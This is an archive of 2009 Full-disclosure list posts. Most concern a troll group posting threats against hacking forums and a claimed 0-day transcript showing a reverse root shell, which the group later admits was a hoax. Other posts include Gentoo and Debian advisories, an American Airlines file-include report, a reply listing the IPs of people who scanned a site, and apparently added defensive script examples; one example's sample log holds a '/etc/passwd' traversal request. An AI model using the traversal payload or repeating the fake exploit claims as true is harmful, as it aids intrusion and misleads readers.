Ureleet wrote:
 n3td3v?  iz that u?  lying again?  do i need 2 bust u out?

 On Thu, Jul 16, 2009 at 6:00 AM, Ant-Sec
 Movementanti.sec.movem...@gmail.com wrote:
   
 The Anti-Sec movement is not just one person. We are a group of people from
 all over the world. We are almost a culture unto ourselves. We are threaded
 throughout the spokes of everyday life.
 We have committed no crimes - our endeavors will ultimately cut down
 computer crime to some degree. The amount of innocent people getting hit
 with financial losses as a result of malicious computer hacking will
 decrease significantly because hacker communities like Blackhat-forums and
 Astalavista have been terminated - or at least for a time, which is still a
 gain.
 This is ultimately a hacker war.
 Furthermore, the Poster of this message is merely a standard bearer of a
 faction of the Anti-Sec Movement. The Poster of this message is not a
 hacker, but is merely reporting the movements of Anti-Sec.
 Sincerely,
 -anti-sec
 Please check out our website at: http://romeo.copyandpaste.info/




 On Thu, Jul 16, 2009 at 7:39 PM, Benjamin Cance cance.consult...@gmail.com
 wrote:
 
 Seriously, you're as delusional as these radical movements who blow up
 buildings and kill people preaching how they feel the West is wrong
 and old ways are best. I see a lot of parallels between them and you.
 You need help, you need a new hobby. Taking down these sites is as
 productive as masturbation. It feels good yes, but is it really that
 satisfying? Nevermind that, you will do what you think is in your
 movement's best interest.

 Regardless, I wish you well in your endeavors. Hope the FBI talk to you
 eventually as you're infringing on the first amendment :)

 Ant-Sec Movement wrote:
   
 Blend in.
 Get trusted.
 Trust no one.
 Own everyone.
 Disclose nothing.
 Destroy everything.
 Take back the scene.
 Never sell out, never surrender.
 Get in as anonymous, Leave with no trace.

 --

 Dear Jesse Labrocca (Omniscient) and Hackforums.net,

 The Anti-Sec movement has officially terminated Blackhat-forums.com
 using yet ANOTHER 0-day exploit that we have discovered. This one
 takes advantage of a previously undisclosed LiteSpeed vulnerability.
 This is primarily to prove that we are serious and committed to our
 primary goal - eradicating full-disclosure of computer vulnerabilities
 and exploits, and terminating general discussion of hacking for any
 n00b and script-kiddie to read and review - and learn from.

 The Anti-Sec movement hopes Hackrforums.net now understands that our
 cyber war against you is NOT a joke. We will be terminating
 Hackforums.net. You are our number one target...we want to savor the
 moment and the suspense. We will strike when you least expect it. This
 we promise.

 Here is a brief transcript of the hacking of Blackhat-forums.com:

 -

 anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com
 http://blackhat-forums.com -p80

 [+] Connecting to blackhat-forums.com:80 http://blackhat-forums.com:80
 [+] Connected Successfully!
 [+] Checking for Lightspeed vulnerability...
 [+] Vulnerable!
 [+] Sending exploit
 [-] Phase 1
 [-] Phase 2
 [-] Phase 3
 [+] Injecting Shellcode...
 [+] Waiting for reverse shell...

 [~] Connected to shell @ 74.86.203.65!

 snip

 uid=0(root) gid=0 (root) groups=0 (root)

 snip

 ---

 By terminating Blackhat-forums.com, we have furthered our goals in
 more ways than one.

 We are coming for you hackforums.net...and Milw0rm.com. We haven't
 forgotten you, Milw0rm. Our juicy Apache 0-day will terminate both
 websites, which will cause a major blow to those who support
 full-disclosure of hacking related information.

 Take out two birds with one stone.

 Sincerely,

 -anti-sec
 



[Full-disclosure] n3td3v is posting as ant-sec

2009-07-16 Thread Ureleet
careful.  n3td3v has found his way back onto the list.  he is now
posting as ant-sec.  he is hacking and spreading disinformation on
full-d.

careful who you talk 2, he has many names.



Re: [Full-disclosure] n3td3v is posting as ant-sec

2009-07-16 Thread T Biehn
I was about to tarball my directory of XSS 0days for them...

Thanks Ureleet!

/typical fd post

-Travis

On Thu, Jul 16, 2009 at 8:54 AM, Ureleeturel...@gmail.com wrote:
 careful.  n3td3v has found his way back onto the list.  he is now
 posting as ant-sec.  he is hacking and spreading disinformation on
 full-d.

 careful who you talk 2, he has many names.



Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

2009-07-16 Thread James Rankin
Apparently N3tty has returned, or, God forbid, he has procreated

My money is on a return, given the Gmail addy

2009/7/16 Ant-Sec Movement anti.sec.movem...@gmail.com

 The Anti-Sec movement is not just one person. We are a group of people from
 all over the world. We are almost a culture unto ourselves. We are threaded
 throughout the spokes of everyday life.
 We have committed no crimes - our endeavors will ultimately cut down
 computer crime to some degree. The amount of innocent people getting hit
 with financial losses as a result of malicious computer hacking will
 decrease significantly because hacker communities like Blackhat-forums and
 Astalavista have been terminated - or at least for a time, which is still a
 gain.

 This is ultimately a hacker war.

 Furthermore, the Poster of this message is merely a standard bearer of a
 faction of the Anti-Sec Movement. The Poster of this message is not a
 hacker, but is merely reporting the movements of Anti-Sec.

 Sincerely,

 -anti-sec

 Please check out our website at: http://romeo.copyandpaste.info/





 On Thu, Jul 16, 2009 at 7:39 PM, Benjamin Cance 
 cance.consult...@gmail.com wrote:

 Seriously, you're as delusional as these radical movements who blow up
 buildings and kill people preaching how they feel the West is wrong
 and old ways are best. I see a lot of parallels between them and you.
 You need help, you need a new hobby. Taking down these sites is as
 productive as masturbation. It feels good yes, but is it really that
 satisfying? Nevermind that, you will do what you think is in your
 movement's best interest.

 Regardless, I wish you well in your endeavors. Hope the FBI talk to you
 eventually as you're infringing on the first amendment :)

 Ant-Sec Movement wrote:
  Blend in.
  Get trusted.
  Trust no one.
  Own everyone.
  Disclose nothing.
  Destroy everything.
  Take back the scene.
  Never sell out, never surrender.
  Get in as anonymous, Leave with no trace.
 
  --
 
  Dear Jesse Labrocca (Omniscient) and Hackforums.net,
 
  The Anti-Sec movement has officially terminated Blackhat-forums.com
  using yet ANOTHER 0-day exploit that we have discovered. This one
  takes advantage of a previously undisclosed LiteSpeed vulnerability.
  This is primarily to prove that we are serious and committed to our
  primary goal - eradicating full-disclosure of computer vulnerabilities
  and exploits, and terminating general discussion of hacking for any
  n00b and script-kiddie to read and review - and learn from.
 
  The Anti-Sec movement hopes Hackrforums.net now understands that our
  cyber war against you is NOT a joke. We will be terminating
  Hackforums.net. You are our number one target...we want to savor the
  moment and the suspense. We will strike when you least expect it. This
  we promise.
 
  Here is a brief transcript of the hacking of Blackhat-forums.com:
 
  -
 
  anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com
  http://blackhat-forums.com -p80
 
  [+] Connecting to blackhat-forums.com:80 http://blackhat-forums.com:80
 
  [+] Connected Successfully!
  [+] Checking for Lightspeed vulnerability...
  [+] Vulnerable!
  [+] Sending exploit
  [-] Phase 1
  [-] Phase 2
  [-] Phase 3
  [+] Injecting Shellcode...
  [+] Waiting for reverse shell...
 
  [~] Connected to shell @ 74.86.203.65!
 
  snip
 
  uid=0(root) gid=0 (root) groups=0 (root)
 
  snip
 
  ---
 
  By terminating Blackhat-forums.com, we have furthered our goals in
  more ways than one.
 
  We are coming for you hackforums.net...and Milw0rm.com. We haven't
  forgotten you, Milw0rm. Our juicy Apache 0-day will terminate both
  websites, which will cause a major blow to those who support
  full-disclosure of hacking related information.
 
  Take out two birds with one stone.
 
  Sincerely,
 
  -anti-sec
  
 

Re: [Full-disclosure] n3td3v is posting as ant-sec

2009-07-16 Thread Charles Majola
HAH!

I knew it

On Thu, Jul 16, 2009 at 2:54 PM, Ureleeturel...@gmail.com wrote:
 careful.  n3td3v has found his way back onto the list.  he is now
 posting as ant-sec.  he is hacking and spreading disinformation on
 full-d.

 careful who you talk 2, he has many names.



Re: [Full-disclosure] n3td3v is posting as ant-sec

2009-07-16 Thread Benjamin Cance
now we know who antisec are/is, i'm going to bed

Charles Majola wrote:
 HAH!

 I knew it

 On Thu, Jul 16, 2009 at 2:54 PM, Ureleeturel...@gmail.com wrote:
   
 careful.  n3td3v has found his way back onto the list.  he is now
 posting as ant-sec.  he is hacking and spreading disinformation on
 full-d.

 careful who you talk 2, he has many names.



Re: [Full-disclosure] n3td3v is posting as ant-sec

2009-07-16 Thread b489op .
Ureleet wrote:
 careful. n3td3v has found his way back onto the list. he is now
 posting as ant-sec. he is hacking and spreading disinformation on
 full-d.

 careful who you talk 2, he has many names.

Common, n3td3v couldn't hack in any form. However much we might
disagree with anti-sec they are still several leagues above n3td3v.



Re: [Full-disclosure] n3td3v is posting as ant-sec

2009-07-16 Thread Gichuki John Chuksjonia
Hehehe, netdev? For real? He is the Anti-sec. I think that's wrong

On Thu, Jul 16, 2009 at 1:35 PM, Benjamin
Cancecance.consult...@gmail.com wrote:
 now we know who antisec are/is, i'm going to bed

 Charles Majola wrote:
 HAH!

 I knew it

 On Thu, Jul 16, 2009 at 2:54 PM, Ureleeturel...@gmail.com wrote:

 careful.  n3td3v has found his way back onto the list.  he is now
 posting as ant-sec.  he is hacking and spreading disinformation on
 full-d.

 careful who you talk 2, he has many names.





-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



[Full-disclosure] [ GLSA 200907-13 ] PulseAudio: Local privilege escalation

2009-07-16 Thread Robert Buchholz
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200907-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: PulseAudio: Local privilege escalation
      Date: July 16, 2009
      Bugs: #276986
        ID: 200907-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability in PulseAudio may allow a local user to execute code
with escalated privileges.

Background
==========

PulseAudio is a network-enabled sound server with an advanced plug-in
system.

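Affected packages
=================

    -------------------------------------------------------------------
     Package                 /  Vulnerable  /               Unaffected
    -------------------------------------------------------------------
  1  media-sound/pulseaudio     < 0.9.9-r54               >= 0.9.9-r54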

Description
===========

Tavis Ormandy and Julien Tinnes of the Google Security Team discovered
that the pulseaudio binary is installed setuid root, and does not drop
privileges before re-executing itself. The vulnerability has
independently been reported to oCERT by Yorick Koster.

Impact
======

A local user who has write access to any directory on the file system
containing /usr/bin can exploit this vulnerability using a race
condition to execute arbitrary code with root privileges.

Workaround
==========

Ensure that the file system holding /usr/bin does not contain
directories that are writable for unprivileged users.

Resolution
==========

All PulseAudio users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot -v ">=media-sound/pulseaudio-0.9.9-r54"

References
==========

  [ 1 ] CVE-2009-1894
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1894

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200907-13.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
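
The workaround in the advisory above can be checked mechanically. This shell script is an added example, not part of the Gentoo advisory or Gentoo's tooling: it lists the directories on the file system holding /usr/bin that a non-root user can write to. The function names and the `--audit` switch are assumptions made for this example.

```shell
#!/bin/sh
# Added example for the GLSA 200907-13 workaround; not Gentoo's own tooling.
# Function names and the --audit switch are assumptions of this example.

# Print the mount point of the file system that holds the path in $1.
# df -P prints one header line, then a record whose sixth and later
# fields are the mount point (which may contain spaces).
fs_root_of() {
    df -P "$1" | awk 'NR == 2 {
        out = $6
        for (i = 7; i <= NF; i++) out = out " " $i
        print out
    }'
}

# Print every directory below $1, staying on one file system (-xdev),
# that somebody other than root can create entries in:
#   world-writable (the sticky bit on /tmp does not prevent creation),
#   group-writable for a group other than gid 0,
#   or owner-writable and owned by a non-root user (home directories).
unprivileged_writable_dirs() {
    find "$1" -xdev -type d \( \
            -perm -0002 \
        -o \( -perm -0020 ! -group 0 \) \
        -o \( -perm -0200 ! -user 0 \) \
    \) -print 2>/dev/null
}

# Run the check the advisory's workaround asks for.
audit_usr_bin_fs() {
    root=$(fs_root_of /usr/bin)
    echo "File system holding /usr/bin is mounted at: $root"
    hits=$(unprivileged_writable_dirs "$root")
    if [ -z "$hits" ]; then
        echo "OK: no directory on it is writable by unprivileged users"
        return 0
    fi
    echo "Workaround NOT satisfied; writable directories:"
    echo "$hits"
    return 1
}

# Only scan the real system when asked to, so the functions can be
# sourced and exercised on a test directory without a full-disk walk.
if [ "${1:-}" = "--audit" ]; then
    audit_usr_bin_fs
fi
```

Invoked with `--audit`, the script exits non-zero when the workaround is not satisfied, which makes it usable as a pre-upgrade check on hosts that cannot take the fixed package yet.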



Re: [Full-disclosure] n3td3v is posting as ant-sec

2009-07-16 Thread kfc.ru...@gmail.com
On Thu, Jul 16, 2009 at 2:54 PM, Ureleeturel...@gmail.com wrote:
 careful.  n3td3v has found his way back onto the list.  he is now
 posting as ant-sec.  he is hacking and spreading disinformation on
 full-d.

Interesting theory, but do you have any evidence that backs this up?
I'm not so sure if n3td3v is back, though it would be funny.



Re: [Full-disclosure] Ant-Sec - We are going to terminate Hackforums.net and Milw0rm.com - New Apache 0-day exploit uncovered

2009-07-16 Thread Valdis . Kletnieks
On Wed, 15 Jul 2009 12:41:02 BST, mrx said:

 ii) Backed up and mirrored the content so that they could be back up in
 24 hours.

Strictly speaking, any site that gives a flying f**k in a rolling donut
about their availability should be doing this *anyhow*, even if they aren't
worried about getting hacked.

Statistically, you're more likely to hear the sound of a disk drive head going
into oxide-plow mode or the click-click-click of a dead servo platter than you
are being hacked.  And you're gonna want backups then.

And no, doing RAID isn't a cure-all.  If there's a fire, all the disks burn. If
there's a plumbing leak upstairs that spills zillions of gallons of water
through your hardware, all the disks spark and short out. Plus, I've seen
enough RAID controllers take a crap all over all the disks far too many times
in my career.




Re: [Full-disclosure] Anti-Sec - We have terminated blackhat-forums.com. Are you scared now Hackforums.net?

2009-07-16 Thread Valdis . Kletnieks
On Thu, 16 Jul 2009 19:18:33 +1000, Ant-Sec Movement said:

 Get trusted.
 Trust no one.

What happens if the guy whose trust you are trying to get happens to
believe in this as well?

Basic theory of protocols (both computer and human): To be successful,
they must be capable of self-interoperation.




[Full-disclosure] [SECURITY] [DSA 1836-1] New fckeditor packages fix arbitrary code execution

2009-07-16 Thread Moritz Muehlenhoff
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

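- ------------------------------------------------------------------------
Debian Security Advisory DSA-1836-1                  secur...@debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
July 16, 2009                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------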

Package: fckeditor
Vulnerability  : missing input sanitising
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2009-2265

Vinny Guido discovered that multiple input sanitising vulnerabilities
in Fckeditor, a rich text web editor component, may lead to the
execution of arbitrary code.

The old stable distribution (etch) doesn't contain fckeditor.

For the stable distribution (lenny), this problem has been fixed in
version 1:2.6.2-1lenny1.

For the unstable distribution (sid), this problem has been fixed in
version 1:2.6.4.1-1.

We recommend that you upgrade your fckeditor package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/f/fckeditor/fckeditor_2.6.2.orig.tar.gz
    Size/MD5 checksum:   934845 8b58da54703e47622e07b8fdc9f5f93d
  http://security.debian.org/pool/updates/main/f/fckeditor/fckeditor_2.6.2-1lenny1.diff.gz
    Size/MD5 checksum:    25408 2e10c633f28bdffa1afda0918783ac9e
  http://security.debian.org/pool/updates/main/f/fckeditor/fckeditor_2.6.2-1lenny1.dsc
    Size/MD5 checksum:     1028 489da6d230d86e6347c2f5839ffd0af3

Architecture independent packages:

  http://security.debian.org/pool/updates/main/f/fckeditor/fckeditor_2.6.2-1lenny1_all.deb
    Size/MD5 checksum:   945672 5a0d59f390945ab2df02c43be8e81a5c


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-annou...@lists.debian.org
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkpfaV4ACgkQXm3vHE4uyloLvwCgkzaouu6V8TbisSreuf6VCuWF
6pUAoNEqmfVDU0LffLY8hdh7NIHGzYvK
=WDKk
-----END PGP SIGNATURE-----



Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

2009-07-16 Thread John Menerick
No.  It is the Illuminati and their New World Order




On Jul 16, 2009, at 5:51 AM, Ureleet wrote:

 n3td3v?  iz that u?  lying again?  do i need 2 bust u out?

 On Thu, Jul 16, 2009 at 6:00 AM, Ant-Sec
 Movementanti.sec.movem...@gmail.com wrote:
 The Anti-Sec movement is not just one person. We are a group of  
 people from
 all over the world. We are almost a culture unto ourselves. We are  
 threaded
 throughout the spokes of everyday life.
 We have committed no crimes - our endeavors will ultimately cut down
 computer crime to some degree. The amount of innocent people  
 getting hit
 with financial losses as a result of malicious computer hacking will
 decrease significantly because hacker communities like Blackhat- 
 forums and
 Astalavista have been terminated - or at least for a time, which is  
 still a
 gain.
 This is ultimately a hacker war.
 Furthermore, the Poster of this message is merely a standard bearer  
 of a
 faction of the Anti-Sec Movement. The Poster of this message is not a
 hacker, but is merely reporting the movements of Anti-Sec.
 Sincerely,
 -anti-sec
 Please check out our website at: http://romeo.copyandpaste.info/




 On Thu, Jul 16, 2009 at 7:39 PM, Benjamin Cance cance.consult...@gmail.com 
 
 wrote:

 Seriously, you're as delusional as these radical movements who  
 blow up
 buildings and kill people preaching how they feel the West is  
 wrong
 and old ways are best. I see a lot of parallels between them and  
 you.
 You need help, you need a new hobby. Taking down these sites is as
 productive as masturbation. It feels good yes, but is it really that
 satisfying? Nevermind that, you will do what you think is in your
 movement's best interest.

 Regardless, I wish you well in your endeavors. Hope the FBI talk  
 to you
 eventually as you're infringing on the first amendment :)

 Ant-Sec Movement wrote:
 Blend in.
 Get trusted.
 Trust no one.
 Own everyone.
 Disclose nothing.
 Destroy everything.
 Take back the scene.
 Never sell out, never surrender.
 Get in as anonymous, Leave with no trace.

 --

 Dear Jesse Labrocca (Omniscient) and Hackforums.net,

 The Anti-Sec movement has officially terminated Blackhat-forums.com
 using yet ANOTHER 0-day exploit that we have discovered. This one
 takes advantage of a previously undisclosed LiteSpeed  
 vulnerability.
 This is primarily to prove that we are serious and committed to our
 primary goal - eradicating full-disclosure of computer  
 vulnerabilities
 and exploits, and terminating general discussion of hacking for any
 n00b and script-kiddie to read and review - and learn from.

 The Anti-Sec movement hopes Hackrforums.net now understands that  
 our
 cyber war against you is NOT a joke. We will be terminating
 Hackforums.net. You are our number one target...we want to savor  
 the
 moment and the suspense. We will strike when you least expect it.  
 This
 we promise.

 Here is a brief transcript of the hacking of Blackhat-forums.com:

 -

 anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com
 http://blackhat-forums.com -p80

 [+] Connecting to blackhat-forums.com:80 http://blackhat-forums.com:80 
 
 [+] Connected Successfully!
 [+] Checking for Lightspeed vulnerability...
 [+] Vulnerable!
 [+] Sending exploit
 [-] Phase 1
 [-] Phase 2
 [-] Phase 3
 [+] Injecting Shellcode...
 [+] Waiting for reverse shell...

 [~] Connected to shell @ 74.86.203.65!

 snip

 uid=0(root) gid=0 (root) groups=0 (root)

 snip

 ---

 By terminating Blackhat-forums.com, we have furthered our goals in
 more ways than one.

 We are coming for you hackforums.net...and Milw0rm.com. We haven't
 forgotten you, Milw0rm. Our juicy Apache 0-day will terminate both
 websites, which will cause a major blow to those who support
 full-disclosure of hacking related information.

 Take out two birds with one stone.

 Sincerely,

 -anti-sec
 


Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

2009-07-16 Thread Ronny Lawson
On Jul 16, 2009, at 3:00 AM, Ant-Sec Movement wrote:

 The Anti-Sec movement is not just one person. We are a group of  
 people from all over the world. We are almost a culture unto  
 ourselves. We are threaded throughout the spokes of everyday life.

So basically, you are legion, for you are many?  If that is true, then  
you can be infiltrated just like any other organization/society/cult.   
Is it that you are so sex-depraved as a result of living in your mom's  
basement and running Noobuntu on a Pentium III that gives you a  
burning desire to troll us all with this charade?  It will only be a  
matter of time before someone leaks inside information revealing Anti- 
Sex to be the weak troll group as we all suspect.

Why hasn't blackhat-forums.com brought their site back up yet?  Only a  
complete dolt couldn't delete the .htaccess undoing the 501 you set  
up.  Either this Jesse Labrocca is a pseudonym of an insider who is  
going along with your little charade, or he is an easy target.  If  
Anti-Sex is as vast as you lead us to believe, then pick on someone  
your own size, buddy.  We will only eat crow when you own up to pwning  
milw0rm.  Also, whois blackhat-forums.com.  Is Jesse Labrocca a  
pseudonym for Chris Morganti in Melbourne Australia?

And who are the Canadian Allstream customer and the Brazilian who ran  
a Metasploit scan on me for a couple of hours yesterday after I  
challenged you to pwn my website http://narc.oti.cz?  I am sure they  
won't appreciate me divulging their IPs: 189.78.142.169 and  
142.161.169.106.   Also, for your enjoyment, here is a list of hosts  
that vuln-scanned or visited http://narc.oti.cz after my full-d post  
yesterday: http://pastebin.ca/1496587



Re: [Full-disclosure] Ant-Sec - We are going to terminate Hackforums.net and Milw0rm.com - New Apache 0-day exploit uncovered

2009-07-16 Thread Elazar Broad
snip
I've seen enough RAID controllers take a crap all over all the
disks far too many times in my career.
/snip

http://www.channelregister.co.uk/2009/03/23/carbonite_sues_promise/

Sound familiar?

On Thu, 16 Jul 2009 13:52:16 -0400 valdis.kletni...@vt.edu wrote:
On Wed, 15 Jul 2009 12:41:02 BST, mrx said:

 ii) Backed up and mirrored the content so that they could be back up in
 24 hours.

Strictly speaking, any site that gives a flying f**k in a rolling donut
about their availability should be doing this *anyhow*, even if they aren't
worried about getting hacked.

Statistically, you're more likely to hear the sound of a disk drive head going
into oxide-plow mode or the click-click-click of a dead servo platter than you
are being hacked.  And you're gonna want backups then.

And no, doing RAID isn't a cure-all.  If there's a fire, all the disks burn. If
there's a plumbing leak upstairs that spills zillions of gallons of water
through your hardware, all the disks spark and short out. Plus, I've seen
enough RAID controllers take a crap all over all the disks far too many times
in my career.


Re: [Full-disclosure] n3td3v is posting as ant-sec

2009-07-16 Thread Ureleet
N3td3v made comment earlier today on Twitter about messing with the
mind of his enemies. Gave him a dose of his own medicine. Now he is
panicking.

Twitter.com/n3td3v

Got u kid. Fuxk off.

O and don't follow him. He likes it. In fact, if u r a n3td3v follower
unsub from his bullshit.

I don't know if he's ant-sec, but I wuldnt b surprised.

On Thursday, July 16, 2009, kfc.ru...@gmail.com kfc.ru...@gmail.com wrote:
 On Thu, Jul 16, 2009 at 2:54 PM, Ureleet urel...@gmail.com wrote:
 careful.  n3td3v has found his way back onto the list.  he is now
 posting as ant-sec.  he is hacking and spreading disinformation on
 full-d.

 Interesting theory, but do you have any evidence that backs this up?
 I'm not so sure if n3td3v is back, though it would be funny.



Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

2009-07-16 Thread mod-raver
nope

i think these guys they miss the darkcore underground warez era
when the 0-day stuff was able only for the few and the really good
underground ppl. Well somehow i miss the 90s too but that's life,
things changing!







On Thu, 16 Jul 2009 20:34:52 +0200 John Menerick
jmener...@netsuite.com wrote:
No.  It is the Illuminati and their New World Order




On Jul 16, 2009, at 5:51 AM, Ureleet wrote:

 n3td3v?  iz that u?  lying again?  do i need 2 bust u out?

 On Thu, Jul 16, 2009 at 6:00 AM, Ant-Sec Movement
 anti.sec.movem...@gmail.com wrote:
 The Anti-Sec movement is not just one person. We are a group of people from
 all over the world. We are almost a culture unto ourselves. We are threaded
 throughout the spokes of everyday life.
 We have committed no crimes - our endeavors will ultimately cut down
 computer crime to some degree. The amount of innocent people getting hit
 with financial losses as a result of malicious computer hacking will
 decrease significantly because hacker communities like Blackhat-forums and
 Astalavista have been terminated - or at least for a time, which is still a
 gain.
 This is ultimately a hacker war.
 Furthermore, the Poster of this message is merely a standard bearer of a
 faction of the Anti-Sec Movement. The Poster of this message is not a
 hacker, but is merely reporting the movements of Anti-Sec.
 Sincerely,
 -anti-sec
 Please check out our website at: http://romeo.copyandpaste.info/




 On Thu, Jul 16, 2009 at 7:39 PM, Benjamin Cance cance.consult...@gmail.com
 wrote:

 Seriously, you're as delusional as these radical movements who blow up
 buildings and kill people preaching how they feel the West is wrong
 and old ways are best. I see a lot of parallels between them and you.
 You need help, you need a new hobby. Taking down these sites is as
 productive as masturbation. It feels good yes, but is it really that
 satisfying? Nevermind that, you will do what you think is in your
 movement's best interest.

 Regardless, I wish you well in your endeavors. Hope the FBI talk to you
 eventually as you're infringing on the first amendment :)

 Ant-Sec Movement wrote:
 Blend in.
 Get trusted.
 Trust no one.
 Own everyone.
 Disclose nothing.
 Destroy everything.
 Take back the scene.
 Never sell out, never surrender.
 Get in as anonymous, Leave with no trace.

 --

 Dear Jesse Labrocca (Omniscient) and Hackforums.net,

 The Anti-Sec movement has officially terminated Blackhat-forums.com
 using yet ANOTHER 0-day exploit that we have discovered. This one
 takes advantage of a previously undisclosed LiteSpeed vulnerability.
 This is primarily to prove that we are serious and committed to our
 primary goal - eradicating full-disclosure of computer vulnerabilities
 and exploits, and terminating general discussion of hacking for any
 n00b and script-kiddie to read and review - and learn from.

 The Anti-Sec movement hopes Hackforums.net now understands that our
 cyber war against you is NOT a joke. We will be terminating
 Hackforums.net. You are our number one target...we want to savor the
 moment and the suspense. We will strike when you least expect it. This
 we promise.

 Here is a brief transcript of the hacking of Blackhat-forums.com:

 --
---

 anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com
 http://blackhat-forums.com -p80

 [+] Connecting to blackhat-forums.com:80 http://blackhat-
forums.com:80
 
 [+] Connected Successfully!
 [+] Checking for Lightspeed vulnerability...
 [+] Vulnerable!
 [+] Sending exploit
 [-] Phase 1
 [-] Phase 2
 [-] Phase 3
 [+] Injecting Shellcode...
 [+] Waiting for reverse shell...

 [~] Connected to shell @ 74.86.203.65!

 snip

 uid=0(root) gid=0 (root) groups=0 (root)

 snip

 ---

 By terminating Blackhat-forums.com, we have furthered our goals in
 more ways than one.

 We are coming for you hackforums.net...and Milw0rm.com. We haven't
 forgotten you, Milw0rm. Our juicy Apache 0-day will terminate both
 websites, which will cause a major blow to those who support
 full-disclosure of hacking related information.

 Take out two birds with one stone.

 Sincerely,

 -anti-sec

[Full-disclosure] Anti-Sec - We're not really Anti-Sec! Sorry Hackforums. It was all a big joke by anonymous!

2009-07-16 Thread Ant-Sec Movement
Yes, that's right, we're not really Anti-Sec.
We have no 0-day exploits.

We did not hack ImageShack or Blackhat-forums or Astalavista. That was the
real Anti-Sec whomever they are.

It was all a big joke.

But our goal was achieved.

We caused a huge stir on Hackforums.net. We've made them look like utter
fools.

Geez, some of them are like "Let's go to the authorities! Mummy and Daddy I
wanna go to authorities because my hacking forum has been threatened." What
a bunch of wimps. You're on a hacking website. You've gotta expect these
things. It's all part of the deal.

We've proved one thing...none of you on Hackforums.net should be there...not
even Jesse Labrocca. He should spend more time with his family rather than
worry about a silly little hacking forum. Or maybe spend more time on your
money-making business. Silly person.

Sincerely,

Anonymous People

Re: [Full-disclosure] Anti-Sec - We're not really Anti-Sec! Sorry Hackforums. It was all a big joke by anonymous!

2009-07-16 Thread Ronny Lawson
Gee, we didn't see that coming or anything.


On Jul 16, 2009, at 2:32 PM, Ant-Sec Movement wrote:

 Yes, that's right, we're not really Anti-Sec.

 We have no 0-day exploits.

 We did not hack ImageShack or Blackhat-forums or Astalavista. That  
 was the real Anti-Sec whomever they are.

 It was all a big joke.

 But our goal was achieved.

 We caused a huge stir on Hackforums.net. We've made them look like  
 utter fools.

 Geez, some of them are like "Let's go to the authorities! Mummy and
 Daddy I wanna go to authorities because my hacking forum has been
 threatened." What a bunch of wimps. You're on a hacking website.
 You've gotta expect these things. It's all part of the deal.

 We've proved one thing...none of you on Hackforums.net should be
 there...not even Jesse Labrocca. He should spend more time with his
 family rather than worry about a silly little hacking forum. Or
 maybe spend more time on your money-making business. Silly person.

 Sincerely,

 Anonymous People


Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

2009-07-16 Thread opt opt
How has it changed?



[Full-disclosure] American Airlines (multiple domains) Local File Include

2009-07-16 Thread Bob Smith
American Airlines' domains have been vulnerable to Local file Include
(I wonder if anyone has flown free using this)

and some sensitive files i found

screen shots
http://i41.tinypic.com/fcns7t.jpg
http://i25.tinypic.com/359z85z.jpg

it's been reported and they don't feel like responding
(if the page doesn't work try taking off a ../)

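An added example, not part of the original post: a web-log check for the kind of request the report describes, flagging `p` values sent to `/aa/i18nForward.do` that climb above their starting directory once percent-encoding is fully undone. The log lines, client addresses and in-site paths are constructed, and the function names are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Common Log Format); clients and paths are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [16/Jul/2009:10:00:01 +0000] "GET /aa/i18nForward.do?p=/home/index.jsp HTTP/1.1" 200 5120
192.0.2.44 - - [16/Jul/2009:10:00:07 +0000] "GET /aa/i18nForward.do?p=../../../../etc/passwd HTTP/1.1" 200 1843
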